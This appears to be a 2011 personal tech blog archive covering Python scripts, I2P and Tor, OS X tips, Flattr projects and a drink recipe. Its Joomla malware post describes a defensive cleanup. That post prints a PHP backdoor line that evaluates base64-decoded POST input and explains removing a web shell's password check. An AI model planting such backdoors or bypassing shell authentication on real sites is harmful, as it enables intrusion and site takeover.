Dark Science, dividing by zero and making recursive images

Leif double facepalming and Simon hanging from the ceiling, normal day at the office

3D printing spam

My Pug Medea chills out on the Flattr rugs

Employed as Ninja

Leif using ninja skillz to avert helicopter attack

Board games and Robots!

Simon enjoying shooting other devs…

I’ll miss the lot of you.

Searching IMAP with Python

2011-08-23T00:00:00+02:00

Searching IMAP with Python

23 Aug 2011

M = imaplib.IMAP4_SSL("imap.mail.com")
M.login(getpass.getuser(), getpass.getpass())
M.select()
typ, data = M.search(None, '(SUBJECT "test")')
for num in data[0].split():
  typ, data = M.fetch(num, '(RFC822)')
  print 'Message %s\n%s\n' % (num, data[0][1])
M.close()
M.logout()

This will search all emails for one with the subject line “test”.
Change the ‘(SUBJECT “test”)’ to whatever you want to search for/in.
There is a good comprehensible list of the commands in the PHP documentaion.
The things in the “Criteria” list can all be used insted of the ’(SUBJECT “test”) string.

Live Coding with Notch

2011-08-22T00:00:00+02:00

Live Coding with Notch

22 Aug 2011

I can’t help loving the concept of live coding. I’ve had a hard time understaning fans of e-sports (as well as sports) and watching streamed games until I watched Notch live stream a coding session a while back.
I had totally forgotten about the concept until this weekend when Notch streamed another coding session.
This time it was part of Ludum Dare, a competition to create a game in 48 hours.
Notch wrote a game called Prelude of the Chambered, it is a nice retro Wolfenstein/Minecraft looking Java game. You can play it here and here is the source code

There is a recording on YouTube from the live coding session. Crack open a beer and enjoy ultra geekness.
Who knows, you might acctually learn something.

Open Graph Fetcher

2011-07-22T00:00:00+02:00

Open Graph Fetcher

22 Jul 2011

Another Open Source day in the Flattr office!
I experimented a little with the Open Graph standard and wrote an python class that parses a website and looks for Open Graph tags. It also has some extra features like automatic caching of images.
You can find the source code on Github.

Problems after upgrade to OS X Lion

2011-07-20T00:00:00+02:00

Problems after upgrade to OS X Lion

24 Mar 2011

Here are a few things that broke after I upgraded my MBP to OS X Lion.
Any help with solving the issues would be highly appreciated.

Three finger slide, one of my most missed features from Snow Leopard. The three finger slide which activated “Back” in browsers.
I am currently unable to reenable this, but I have noticied that Safari has got this function (with one finger). If there are any fixes to reenable this in Firefox or Chrome please leave a comment!
GPGMail stopped working. Had to install Thunderbird to continue my encrypted correspondence (haven’t been able to get this working either atm).
Time Machine stopped working. I’ve got an Ubuntu server running as Time Machine disc and since the upgrade my MBP has been complaining about lacking AFP function support.

A lot of stuff broke, but ey, we got full disc encryption and the posibility to resize windows in all the corners!

Flattr button now on the SoundCloud widget

2011-07-17T00:00:00+02:00

Flattr button now on the SoundCloud widget

17 Jul 2011

As I have written about before, Flattr now has a new feature that lets you integrate with SoundCloud.
I’m not a musician myself, but this is great news for all artist uploading their tracks to SoundCloud and who want to let their listeners support them financially.
What’s new though is that now SoundCloud shows a nice Flattr logo in you player widget if you integrate the services.
Great! No need for an extra flattr button for each song!
It’s really simple to activate! Just connect your Flattr and Soundcloud account here (but don’t forget that if you submit new songs to SC and you want to give them Flattr buttons as well you have to connect your accounts again).

Pretty sweet huh?

Flattr on wordpress.com, ShareDaddy and on AddThis.

2011-07-04T00:00:00+02:00

Flattr on wordpress.com, ShareDaddy and on AddThis.

04 Jul 2011

This tool helps you add Flattr buttons on Wordpress.com and everywhere where you use ShareDaddy.
And this tool helps you integrate your flattr button in AddThis code.

I hope you find some use for them!

Flattr widget for Blogger.com

2011-07-01T00:00:00+02:00

Flattr widget for Blogger.com

01 Jul 2011

I wrote a flattr Widget for blogger.com (blogspot.com). It adds a general flattr button for your site which you can drag around like a normal Gadget.
And if you want it can also add flattr buttons to all your blog posts.
If you like it Flattr the project here:

SoundCloud and Flattr sitting in a tree...

2011-06-17T00:00:00+02:00

SoundCloud and Flattr sitting in a tree…

17 Jun 2011

Update: This feature is now integrated with flattr.com, read more about it here.

Here is a webapp I wrote which lets you submit all of your SoundCloud tracks to Flattr.
It can also redirect the “Buy”-link on your songs to point to your Flattr Thing and it can drop a comment on your track to tell all your listeners that they now can show their love for your music throught Flattr!

Hyde Flattr auto submission

2011-06-09T00:00:00+02:00

Hyde Flattr auto submission

09 Jun 2011

I’m working at Flattr this summer. A great company with visions to improve the world!
Anyway, today was Open Source day at Flattr and all of the developers coded away on different project.
I wrote this Flattr auto submission layout for the static site generator Hyde.
Fork it on GitHub!

Hack day på Blekingska Nationen

2011-06-01T00:00:00+02:00

Hack day på Blekingska Nationen

01 Jun 2011

Sitter du med fast i Lund i sommar och vill låta kreativiteten flöda lite?
Kom bort till Blekingska Nationen den andra Juli och delta i Blekingska Hack Day som jag anordnar.
Temat för dagen är Mash-ups. Vi skriver i små grupper ett gäng applikationer på 6-7 timmar varefter vi avrundar med grillning om folk känner för det.
Är du intresserad kan du läsa mer om det här eller på facebook.
Är du sugen på att delta så glöm inte att trycka ‘attending’ på facebook, maila mig eller lämna kontaktuppgifter i Piratepad;en

I2P Pastebin parser

2011-05-29T00:00:00+02:00

I2P Pastebin parser

27 May 2011

I forked a Pastebin parser I read about on Hacker News and enabled it to parse the (I only know of one) pastebin hosted on I2P.
I thought that I would stumble upon lots of more interesting stuff on the I2P pastebin than on the vanillla internet version. Turns out I didn’t.
The anonymous people chilling out on I2P seems like a really friendly bunch :).
The only thing I really found of interest is a script to spoof MAC addresses on AirPorts. (Then again there aren’t alot of pastes in the i2p pastebin (yet!))

Here is the code to parse the I2P pastebin (you need to have BeautifulSoup and an I2P proxy running on 4444 for this to work).

import BeautifulSoup 
import urllib2 
import time 
import Queue 
import threading 
import sys 
import datetime
import random 
import os 
pastesseen = set() 
pastes = Queue.Queue()
proxy = {"http": "http://127.0.0.1:4444/"}
handler = urllib2.ProxyHandler(proxy)
opener = urllib2.build_opener(handler)
def downloader():
	while True: 
		paste = pastes.get() 
		fn = "pastebinsi2p/%s-%s.txt" % (paste, datetime.datetime.today().strftime("%Y-%m-%d")) 
		content = opener.open("http://empth.i2p/pastebin/" + paste).read() 
		soup = BeautifulSoup.BeautifulSoup(content) 
		content = str(soup.find(id="content"))
		if "requesting a little bit too much" in content: 
			print "Throttling... requeuing %s" % paste 
			pastes.put(paste) 
			time.sleep(0.1) 
		else: 
			f = open(fn, "wt") 
			f.write(content) 
			f.close() 
		delay = 1.1 # random.uniform(1, 3) 
		sys.stdout.write("Downloaded %s, waiting %f sec\n" % (paste, delay)) 
		time.sleep(delay) 
		pastes.task_done() 
def scraper(): 
	scrapecount = 0 
	while scrapecount < 10: 
		html = opener.open("http://empth.i2p/pastebin/recent.php").read() 
		soup = BeautifulSoup.BeautifulSoup(html) 
		div = soup.find(id="recent") 
		ul = div.find("ul")
		for li in ul.findAll("li"): 
			href = li.a["href"] 
			if href in pastesseen: 
				sys.stdout.write("%s already seen\n" % href) 
			else: 
				pastes.put(href) 
				pastesseen.add(href) 
				sys.stdout.write("%s queued for download\n" % href) 
			delay = 12 # random.uniform(6,10) 
			time.sleep(delay) 
			scrapecount += 1 
num_workers = 1 
for i in range(num_workers): 
	t = threading.Thread(target=downloader) 
	t.setDaemon(True) 
	t.start() 
if not os.path.exists("pastebinsi2p"): 
	os.mkdir("pastebinsi2p") # Thanks, threecheese! 
s = threading.Thread(target=scraper) 
s.start() 
s.join()

It is forked from this blog post (hope you don’t mind mate).

Anonymous IRC server

2011-05-27T00:00:00+02:00

Anonymous IRC server

27 May 2011

Everything needed should be explained here on kryptoanarki.se or if you prefer darknets kryptoanarki.i2p.
The IRC server allows you to connect to it through the I2P darknet or as a TOR hidden service.
Chrisk has a short guide how to connect with tor on is blog.
I could find any good guides on how to connect with I2P (notetoself: write your own) but basically you go to local tunnel configurations and create a new client IRC client tunnel. Then you point it to kryptoanarki.i2p or the base64 code on the website. After this is done you can simply connect to localhost and the port you specified.
To flattr the project please use this button:

and to flattr the blog use this one:

Press key with Python on OS X

2011-05-22T00:00:00+02:00

Press key with Python on OS X

22 May 2011

This is what I had to do to programmatically generate key pressed and mouse events on OS X with Python.
First I had to download a Python wrapper around Objective C which I found here. I downloaded the trunk (with svn) and then I navigated to the folder containing Quartz and ran the setup script.

	$	svn checkout http://svn.red-bean.com/pyobjc/trunk/
	$	cd trunk/pyobjc/pyobjc-framework-Quartz 
	$	python setup.py install

Checking out the trunk acctualy checks out a lot of files not not needed, but hey, better safe than sorry.
After this was done I was able to import the Quart.CoreGraphics module in python.
I borrowed this code snippet from here to make sure it worked, and it did, like a charm.

	import sys
	import os
	import time
	from Quartz.CoreGraphics import CGEventCreateMouseEvent
	from Quartz.CoreGraphics import CGEventPost
	from Quartz.CoreGraphics import kCGEventMouseMoved
	from Quartz.CoreGraphics import kCGEventLeftMouseDown
	from Quartz.CoreGraphics import kCGEventLeftMouseDown
	from Quartz.CoreGraphics import kCGEventLeftMouseUp
	from Quartz.CoreGraphics import kCGMouseButtonLeft
	from Quartz.CoreGraphics import kCGHIDEventTap
	
	def mouseEvent(type, posx, posy):
	        theEvent = CGEventCreateMouseEvent(None, type, (posx,posy), kCGMouseButtonLeft)
	        CGEventPost(kCGHIDEventTap, theEvent)
	def mousemove(posx,posy):
	        mouseEvent(kCGEventMouseMoved, posx,posy)
	def mouseclick(posx,posy):
	        mouseEvent(kCGEventLeftMouseDown, posx,posy)
	        mouseEvent(kCGEventLeftMouseUp, posx,posy)
	def main():
		mousemove(0,0)
	if __name__ == '__main__':
		main()

Arduino joystick

2011-05-22T00:00:00+02:00

Arduino joystick

22 May 2011

I have made some more progress on my ardunio “joystick”.
I have now added support for the joystick (and not just the buttons) and written an interface allowing it to work with the xte library on Linux computers.
It is far from done, at the moment a keypress generates alot of mouse clicks (as you can see in the video) and it needs more work in the sensitivity on the joystick.
I will soon release the source code on GitHub (if I can manage to find the C code I have compiled to the arduino).

Here is a low-qual video of me demonstraiting the controller on Ubuntu 10.04.

UPDATE: I’ve got the damn thing running on OS X Snow Leopard too. Here is another low qual video of me demonstrating the joystick.

Maybe not the most jaw dropping project out there, but you have to excuse me, I am having too much fun ^^

The Absolute Sandman

2011-05-17T00:00:00+02:00

The Absolute Sandman

17 May 2011

As soon as I get some cash…

Python ftp client

2011-05-15T00:00:00+02:00

Python ftp client

15 May 2011

I started writing a terminal based FTP client in python a few days back. The idea is that it should support multiple servers allowing the user the search them all at once and automating the choice of server when a file is selected for download.
The project is open source and can be found here on github. Feel free to help out, it is nowhere near done (really just a zero-day iteration atm).

Update: A nice read about the joy of Open Source and a mention to this project.

Here is a Flattr button for the project:

This one is for the blog in general:

Laptop stickers

2011-05-13T00:00:00+02:00

Laptop stickers

13 May 2011

Got two new stickers for my new laptop.

The Anonymous-suit-guy I bought at stuckoff.com. It is really nice quality but I had to cut of bits of his legs since I the laptop is 13" and it seemed to be made to fit the 15" models.
The telecomix sticker I got from Sikevux (Thanks!).

Chrome and Firefox shows passwords in plaintext

2011-05-03T00:00:00+02:00

Chrome and Firefox shows passwords in plaintext

03 May 2011

I just noticied that when if you access Options→Personal→Password Manager in Chrome or Settings→Security→Stored Passwords in Firefox your password are shown in plain text. Thus is it easy for anyone who has access to your computer to see all your stored passwords in plaintext and not just access the sites from your computer.
You can protect yourself against this in Firefox by setting a Master Password, in Settings→Security, forcing anyone using your computer to type in a password to get access to the other passwords. I do not know of a way to do this in Chrome, but if you do please leave a comment.

Brygga punsch

2011-04-28T00:00:00+02:00

Brygga punsch

28 Apr 2011

Inspirerad av Edward Bloms framträdande bryggde jag nyss Punsch enligt följande recept:

* 3,5 dl Arrak
* 1dl starkt svart te
* 1,5 dl brännvin
* 2 dl strösocker
* 1/2 dl citron
* 3,5 dl kokande vatten

Jag lade även till
* 4 cl brandy/cognac
* 1 tsk honung

Blanda först alla de kalla ingredienserna. När du har hällt på sockret så rör om tills det har löst sig. Häll därefter på det kokande vattnet, smaka av och tillsätt sedan efter tycke.

Nu skall min punsch stå till sig och smakas av om några veckor och jag skall då återkomma med det slutliga omdömet men jag kan påpeka redan nu att jag fann Punschen att vara något för sur. Nästa gång jag försöker (skam den som ger sig) så skall jag minska mängden citron och eventuellt ha lite mer sötma i. Jag är även intresserad av att blanda i lite whisky för att förgylla smaken.

Punschreceptet får en egen flattr-knapp:

Har du något punschrecept eller förslag på förbättringar så lämna gärna en kommentar, detta är ju trots allt mitt första försök.

update

Efter att ha kokat ett par omgångar punsch till kan jag starkt rekommendera att koka upp ett sockerlag istället för att blanda ut sockret direkt i drycken som ovan.

Using I2P instance on a server locally on laptop

2011-04-27T00:00:00+02:00

Using I2P instance on a server locally on laptop

27 Apr 2011

To avoid battery drainage, and such, I do not run I2P locally on my laptops since I already run a rather high speed node on one of my servers.
But of couse, like everyone else, I like to be able to visit my darknetz even on the move. So I have solved this by using SSH to make an encrypted tunnel to my server and binding port 4444 (the standard port) on localhost to 4444 on the server running my I2P node. It works like a charm.
I put this in my .bash_profile (or .bashrc or whatever floats your boat).

function i2p(){
        ssh -NL 4444:localhost:4444 user@my_server_ip_or_address.com 
}

As I have written about before I use FoxyProxy to automatically choose when I need to use the I2P port and when I do not.
It really works like a charm.

Send Page Up to Weechat in OS X terminal

2011-04-22T00:00:00+02:00

Send Page Up to Weechat in OS X terminal

22 Apr 2011

To send Page Up to Weechat when you are using the OS X terminal (instead of page up triggering “scroll up” in the terminal window) press

[shift][ctrl] + [up]

TrueCrypt on OS X Snow Leopard

2011-04-19T00:00:00+02:00

TrueCrypt on OS X Snow Leopard

19 Feb 2011

It seems that there is a generalt notion out there that Snow Leopard breaks the support for TrueCrypt on OS X.
It is true that you are unable to mount encrypted files after install. I got an error saying something like macfuse file system not available.
There exists an easy fix for this though:
The problem seems to be caused by a dependency, MacFuse, that does not work with the 64bit verison of OS X. I solved this by installing another binary of MacFuse that supports 64bit OS X.
It can be found here. If you do not trust the source it may be possible to install MacFuse
through MacPorts with 64bit support, I have not confirmed this though. If you know more about this please drop a comment below.

Problem with authentication on APF on Ubuntu

2011-04-15T00:00:00+02:00

Problem with authentication on APF on Ubuntu

15 Apr 2011

After setting up an APF share on my Ubuntu machine I was unable to authenticate correctly when I tried to connect to it with my OS X machine.
The login window claimed that I used a incorrect username or password.
I found the solution to it here on the ubuntu forum:
Simply edit the /etc/netatalk/afpd.conf config file and replace ‘uams_dhx.so’ with ‘uams_dhx2.so’ so the line looks like so:

- -transall -uamlist uams_randnum.so,uams_dhx2.so,uams_guest.so -nosavepassword -advertise_ssh

I set up the share while following this great guide so I expect that a lot of Ubuntu users following the guide will run into the same problem.
Also: Since I used Ubuntu 10.10 Netatalk already seems to contain the necesary encryption and I could skip compiling it myself and I simply got it by grabbing it from the repository with

sudo apt-get install netatalk

Check your IP adress in the terminal

2011-03-29T00:00:00+02:00

Check your IP adress in the terminal

29 Mar 2011

Here is a simple way of finding out what WAN IP adress you have, according to an external source, through the terminal.

        wget www.whatismyip.com/automation/n09230945.asp

A file called n09230945.asp will now have appeared in your current working directory containing your IP adress.

Update:
A find got a much cleaner solution as a tip in the comments.
I put these commands in the .bash_profile file in my home directory.

function myip(){
	curl www.whatismyip.com/automation/n09230945.asp
	echo ""
}

(To reaload the .bash_profile file without rebooting write source .bash_profile and the settings will be reread).
Now I am able to check the IP adress by writing

myip

in the terminal and get the output directly in the terminal.

The TOR bundle as torrent

2011-03-28T00:00:00+02:00

The TOR bundle as torrent

28 Mars 2011

Here is a copy of the TOR bundle as a torrent file.

Currently only the Linux versions, if someone wants me to host OS X or Windows versions please drop a comment below.

What is it? The TOR bundle is a package that contains TOR and Mozilla Firefox. You just download it and start the browser included and you will be connected to the TOR network. A good solution if you want to stay anonymous on a borrowed/public computer.
If you are at home on your own computer I do not recommend that you use the TOR bundle but rather download the normal TOR installation. In that way you are able to use your Internet connection to contribute to the TOR network and help speeding it up and not just leeching on other peoples bandwidth. A simple way to become an everyday hero by helping repressed people around the world get Freedom of Speech.
Why? I thought it a bit weird that torproject.org doesn’t offer the tor bundles as torrents.
I’m just guessing here but it seem to me that their website would be the first thing blocked if someone were trying to censor Internet traffic.

Please help me seed these torrents. Also, if you notice that the bundle torrent hosted here is an old version please notify me and I will try to keep it updated.

Install Firefox 4 on Ubuntu

2011-03-24T00:00:00+01:00

Install Firefox 4 on Ubuntu

24 Mar 2011

I’ve not been able to update the blog recently. I’ve been busy busy with exams and a trip to Finland to visit Åbo Nation. Here comes a minor update.

Currently if you do a normal update from the Ubuntu repository Mozilla Firefox does not get updated to the latest stable release (4).
To avoid having to install another Firefox browsers you can add the Mozilla repository.
Simply type

sudo add-apt-repository ppa:mozillateam/firefox-stable

sudo apt-get update

sudo apt-get upgrade

Voilá. Your Firefox browser is now updated to the latest stable release.

No password hashes loaded

2011-02-15T00:00:00+01:00

No password hashes loaded

15 Feb 2011

If you get the error message “No password hashes loaded” when using John the Ripper on Ubuntu it is probably due to the fact that you are using the repositary version on Ubuntu 9.04 or a later version.
This is because it lacks sha-512 ecnryption support. To fix this you have to compile it yourself. Read more about it here.

SharePhoto for android - NO LONGER MAINTAINED

2011-02-13T00:00:00+01:00

SharePhoto for android – NO LONGER MAINTAINED

13 Feb 2011

Please note that this project is no longer maintained and is made unavailable.

SharePhoto is a android application design to help people share pictures easily.
The application uploads the picture to a webserver and presents the user with an easily shareable URL!
The pictures are hosted for 24h and are removed after that.

The application is currently unavailable on Android Market but I hope that an official launch is imminent.

How-to

To share a picture open the gallery and press the Share-button and then select SharePhoto. Now you are done!
The picture will be hosted on the server for 24h, the URL will be presented to you in the textbox in the application. There are two buttons, one allows you to open the URL in the browser and the other copies the URL to the clipboard so you can paste it later in an e-mail, on IRC or on a forum. Remember; Sharing is caring!

FAQ

When will the application be available for the public?
Before the week ends hopefully, I am working on a few last minute fixes and some graphics for the icons

How big pictures can I host?
The limit hasn’t been set yet. It will depend on how though the load on the server will be and if I can afford more server power from my ads/flattr-revenue.

How many pictures can I host?
The limit hasn’t been set yet. See the question above.

Help! I uploaded a picture by mistake, how do I remove it?
At the bottom of the page there is a link called “remove this image” press that. If you are using the same IP as when you uploaded the image then the picture will be removed automatically. If you are not you have to type in your Secret (found in Menu→Secret on the android app) in the box that will promt you for it.

I found a picture breaking the rules!
Report it to the email at the bottom of the pictre, don’t forget to include the URL!

I found a bug in the appilcation
Send me an email and explain the problem, or drop a comment below. I develop this app on my spare time but I will do my best to fix any problems discovered.

I develop this application on my spare time, and I pay the server fee out of my own pockets so any monetary support I could get is highly appriciated. Below is a link the the projects flattr!

Flattr the project:

Flattr the blog:

Display RSA fingerprint visually on Ubuntu

2011-02-01T00:00:00+01:00

Display RSA fingerprint visually on Ubuntu

01 Feb 2011

Today I got reminded of a great trick to overview the RSA fingerprint when you SSH to a remote machine.
It makes it alot easier to get an overview of the fingerprint and see if somethings looks wrong/different.
Just add

VisualHostKey yes

to your ssh config file (on most linux dists it in /etc/ssh/ssh_config). The output will then like this:

The authenticity of host '192.168.1.100 (192.168.1.100)' can't be established.
RSA key fingerprint is 14:6f:09:d6:fd:26:33:f3:48:8c:05:5c:c0:6e:25:2f.
+--[ RSA 2048]----+
|                 |
|       .         |
|        + .      |
|       . =       |
|        E +      |
|       o = *     |
|        = + *    |
|       . o ==o.  |
|          o .Bo  |
+-----------------+
Are you sure you want to continue connecting (yes/no)?

Saturday hack

2011-01-31T00:00:00+01:00

Saturday hack

31 Jan 2011

Yesterday was hacknight and I had a few friends over in my appartment.
We also made it a key signing party so now you can find my PGP key here or on pgp.mit.edu. If you want to communicate with me encrypted.

I mostly worked on a proof of concept Blackthrow box (svartkast) which I will probably write more about in the future when it is done. We got most of the features working on it with both as a TOR-hidden service and accesable through I2P. The truecrypt disks are mounted by hand on the otherwise unencrypted system to make it more recilliant to power-outs and other reboots. More on this subject another day.

There where also some Android hacking going on and a arty java- program was written to play any binary file as a MIDI song… :D (source and the developers blog can be found here).

A crawlbot trap was also developed (for bots who doesn’t follow robots.txt). I’m hoping to be able to publish the source code for it here soon! Stay tuned.

All in all it was a fun night. I hope we will be able to host another hack night soon.

Blog available through I2P Darknet!

2011-01-22T00:00:00+01:00

Blog available through I2P Darknet!

14 Jul 2010

This site is now available through the i2p darknet on this address.
If it is not working you can try the base32 address

http://l6jdiukagsjyojpdhufpsrap5csi6z5tbiedz6v7ze6ohldqzt5a.b32.i2p/

But what is I2P? Visit i2p2.de to learn more about it.
Short answer is that I2P is a tool for democracy and freedom of speech.
Here is a guide I’ve written (in Swedish) on how to connect to i2p.

Updated Atom feeds for the blog

2011-01-20T00:00:00+01:00

Updated Atom feeds for the blog

20 Jan 2011

Now there are three different Atom- feeds for this blog.
One that has all the new blog posts here.
One for those who are only interested in the software development part of the blog here.
And one for those who are not interested in the software posts at all here.

Mac mini as a HTPC

2011-01-19T00:00:00+01:00

Mac mini as a HTPC

19 Jan 2011

About a year ago I bought my first OS X machine, a mac mini (late 2009 model), to use as a HTPC in our living-room.
Here are my thoughts on how it has worked out if you are planning on buying one yourself for the same purpose.

Looks: As you can see on the pictures below the Mac Mini is a stylish little piece of computer. It fits discreetly in the room, and the new model is even thinner. The machine is also really quiet and it is hard to notice if it is on or off (atleast if you are not reading from a CD).
Connections: For sound I use the 3,5 mm audio cable and the screen is plug-in in to the TV with an Mini Display-Port to DVI.

Energy-efficient: Apple claims that it is the "World's most energy-efficient desktop computer".
Software: I use Plex as a media solution. It looks great and it is a pleasant way to browse through my videos. Plex works with music as well but it is not exceptional, I usually find myself using iTunes or VLC instead to play music even if I am not satisfied with them either. If you have any tips for me please leave a comment.
Remote control: The greatest feature on the Mac mini is the Apple Remote I bought with the computer. After a bit of tweaking I had it working great with Plex. I can start and browse all my movies without walking up to the TV. Unfortunately when it started to work with Plex it stopped working with all the other programs (like iTunes) which is a bummer. I haven't put much energy into fixing the problem and I guess there is a way around it (I found some apps for it but they where not free (as in beer) so I just never bothered).
Another great feature with Plex it that it lets you watch compressed files so I do not have to unzip all my files manually and store them uncompressed.
When I have to do other stuff on the Mac, like installations etc, I connect to it with openVNC from one of my Ubuntu computers and remote control it that way. Besides some trouble with key mapping it works great.
Performance: I store my media on an Ubuntu Server with a Samba share. I have then mounted this share in Plex and stream all the media I watch/listen to. It works great, and I even run it over Wifi (Linksys wrt54gl router running Tomato). It plays 720p videos without much problems over the wifi but if I want to watch 1080p I have to transfer the file to the local Mac Mini hard-drive. I think that it is the wifi that is the bottle neck though.
DVD-player:I do not watch much DVDs so I can't really say much about the DVD player. All i know is that is rather noicy, and I really miss BluRay support.
Price: The Mac Mini cost more now then when I bought it. I think I payed about 6000 SEK for it (current price is 6995 SEK). It is and was a rather expensive computer. You could get something like this a lot cheaper and install some free Linux dist on it. But I thought it would be fun to try out working with OS X and get some experience with the OS and it has been a rather smooth ride so far.
Summary: Would I recommend it? Yeah sure, it is a great machine and it easy to use. It is a bit pricey though and you could easily achieve the same result with a small desktop computer running Linux and Xbox media center. As always it depends on how much time you want to spend on setting it up.

Malware on Joomla page

2011-01-14T00:00:00+01:00

Malware on Joomla page

14 Jan 2011

I help running a Joomla website for a student organisation in Lund. We have had problems with someone getting access to our web server and adding code to our PHP files.

The added code is mostly obfuscated with the command ‘base64_decode(“jsadj.. jibberish ..ajdsa”)’. You can read about an earlier encounter we had with this problem on my old blog here.

It took us a long time to notice the attack since the only visible change they made to the website was to redirect google searches from our website to malware websites in Poland.
The difference between the last time and this latest injection is that this time there where thousands of lines of code added to the website.
I downloaded a copy of the website to my local Linux server (since we do not have SSH access to our web server) and searched for “base64_decode” with this command

find . -type f -name "*.php" -exec grep -H "base64_decode" {} \; > potentially_infected_files.txt

This search revealed that almost all php files on the website where infected. Then we began the cumbersome work to disinfect and remove all of the infected code (we had to be rather careful since Joomla also uses base64_decode in some places).
Then I stumbled over a way more simple way to remove most of the attackers work; In a file in called /cache/z.php there where a base64_decode function which decoded a very long message (a couple of thousand LOC). It was somewhat hard to decode since they used several layers of obfuscation. They had encoded it with both base64, str_13 and then compressed it. With a little tinkering I managed to see the code though.
It seemed to be some sort of a interface to control our website. But when I visited the /cache/z.php site directly through the browser all I could see was this:

So I set to work and removed the authentication sequence in the code and uploaded it to the file again.
I removed line 36

( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )

Now I had access to the attackers shell. Here is a picture of what it looked like:

I could make out from comments in the code that the tool is called WSO Shell by oRb and can be downloaded here.
The best thing about finding the shell was the “self remove” button. So since I had the sited backed up I decided to try it out. And guess what, it worked. It removed almost all of the inserted code on the website!
Even though it removed the majority of the bad code it did not remove all of it. They had to get into the website to install the shell in the first place right?
A couple more rounds with the search commands helped me to find some more malware code. They had i.e. on several places left commands that looked like this

eval base64_decode($_POST[“php”]);

Which would allow them to execute any php code on the website they wanted.
This command help us out a lot when we had to remove several versions of the same code in several files.

find . -type f -name "*.php" -exec sed -i -e 's/eval(base64_decode("ZXJyb.. the thing you want to remove ..NCiR1YT0kX1="));//g' {} \;

When we had removed all of the injected code we were able to find we made an security upgrade of Joomla, changed all passwords and checked the site for XXS (cross site scripting) vulnerabilities with a great Firefox add-on called XXS ME but could not find any.
I hope that this post can aid someone who have similar problems.

UPDATE: The entry point – 2011-05-03

Alright, once again the site was infected. Apparently the security flaw wasn’t fixed in the security patch we downloaded for the website. Me and my friend once again put our wise heads together to figure out how the attacker got in to the website.
We began by searching through the apache logs looking for access to the file post.php which contained eval base64_decode($_POST[“php”]); mentioned earlier.
After searching the logs we found someone had access the file.

	$ grep -n -e "POST	/includes/post.php" access_combined.log
	$ 447914:www.website.com 70.00.000.000 - - [25/Apr/2011:14:02:04	+0200] "POST /includes/post.php HTTP/1.1" 200 406 "-" "-"

When we found access to the file in the logs we then searched the logs for the IP address that had accessed the file.
The result looked something like this

	$ grep -n -e "70.00.000.000" access_combined.log
	$ 422787:www.website.com 70.000.00.00 - - [19/Apr/2011:12:27:39 +0200] "POST /components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php HTTP/1.1" 200 5 "none" ""

This gave us a rough list of what the attacker had been up to. And we could by looking at the earliest entries single out the entry point to our website.
It was an old plugin we had lying around that hadn’t got an security update since 2009. In our case it was an old version of Ozio Gallery.
We removed the plugin, uninstalled the attacker shell (as described above) and then removed all the base64 obfuscated redirects in the same manner as last time.
This time I even found a little greeting from the cracker crew in my robot.txt file.
Good luck in your attempts to clean out your website.

Arduino hand controller controlling a pygame

2011-01-09T00:00:00+01:00

Arduino hand controller controlling a pygame

09 Jan 2011

Blog post of minor interest perhaps but I am eager to show of the progress I’ve done on my Ardunio hand controller.

I’ve written a simple game in the python library Pygame which I am able to control with my hand controller.
It is no where near done, right now I only use the buttons and not the joystick. It would be fun to write real joystick firmware to it so I could use it with any game that has joystick support. We shall see what the future holds.
I’m planning to release all of the source code here on the website as soon as I’ve tidied it up a little.

AF Bostäders nya lägenhenheter som RSS

2011-01-04T00:00:00+01:00

AF Bostäders nya lägenhenheter som RSS

04 Jan 2011

Efter att min flickvän har klagat över att hon var tvungen att gå in på www.afb.se varje dag för att se om det kommit upp några nya bostäder så beslöt jag mig för att skriva ett litet pythonscript som parsar AF Bostäders hemsida efter nya lägenheter och presenterar dem som ett RSS flöde som man kan följa med t.ex Google Reader.

Det är ett snabbt hack men jag tänkte att det kanske finns någon annan som också skulle kunna vara intresserad av att uttnyttja RSS-flödet så jag länkar till det här.

För tillfället så är UTF-8 encodingen inte är helt korrekt så åäö blir ibland fel tecken. Utöver det tänkte jag lägga till så att man kan ställa in i sitt flöde om man endast vill ha med lägenheter i en viss storlek eller från ett visst område. Uppdaterar här, samt skriver på twitter när det är fixat.
Har du någon nytta av flödet så flattr;a mig gärna!

Om ni märker att feeden slutar fungera eller att något saknas så lägg gärna en kommentar nedanför eller så skicka mig ett mail och beskriv vad det är som saknas!

Här en Flattr-knapp till RSS feeden, tryck gärna och hjälp mig betala serverkostnaderna :*

Update: På grund av ökad popularitet för RSS feeden har jag skrivit om det lite så att det nu mera är ett cron- job som körs en gång om dagen (kl 0100, ungefär när AFB updaterar sina nya bostäder) istället för att scriptet körs var gång någon besöker hemsidan. Det minskar trafiken till www.afb.se kraftigt så jag slipper överbelasta dem. Ni som använder feeden bör inte märka någon skillnad då afb endast verkar updatera hemsidan en gång per dygn ändå.

English summary: I’ve made a small python hack to parse www.afb.se for new apparments from AFB in Lund, Sweden, and present it as an RSS-feed. Here is a link to it.

Common sense

2010-12-15T00:00:00+01:00

Common sense

15 Dec 2010

When talking to people about computers I am often surprised at how many who forget/don’t care to/don’t know how to do a few basic things every computer user should do. So I thought I’d summarize a few tips below.

Backup your data regularly.

Encrypt your hard drives.

Use encrypted connections when you are on a network.

Backup your data regularly!

You WILL lose your files unless you backup your files on an external media.

Think of all the family pictures, videos and all the memories that will be lost if your hard drive broke?

If you do any kind of work on your computer this gives you even more of a reason to back it up.

There are millions of ways that you can lose your files. Your hard drive can simply break, you might accidentally delete something, it might be stolen (big risk with a laptop), your house might burn down or the police might steal it.

Backup your files, and do it regularly! Preferably back it up to a location outside your house (so it won’t get stolen or burnt in case of a robbery or a fire).
There are several ways to do this, either you ask a friend to set up an FTP server on her computer to which you could upload your files (tip: store them encrypted so she can’t see your private files). In return for the favor you can offer her to backup files on your hard drive, or you could give her a disk to store your files on.
If this is to much work for you, you can try out some of the cloud storage services. Ubuntu has a built in service called Ubuntu One. Another one is Dropbox.
These services are free if you only need a few GB of data. In case you need more you need to pay a monthly fee.

Encrypt your hard drives!

What most people think the log-in screen on your computer does, encryption really does. It is easy to get past the login screen on all normal operating systems. Even if someone is unable to log in to your computer they could just mount your hard drive on their own computer and see all your files.
So if your computer is stolen or otherwise compromised it is always good to have the files encrypted. Preferably the whole hard drive.
There are several ways to do this, Ubuntu offers to encrypt your hard drives when you install it. For other operating systems there are a lot of alternatives. One example is TrueCrypt.

Use encrypted connections when you are on a network

Whenever you are using a network, and especially if you are using a wireless connection you should do your best to use encrypted connections. It is very easy to “listen” to wireless connections and steal information from you (like your Facebook password, credit card number, your chat conversations and so on).
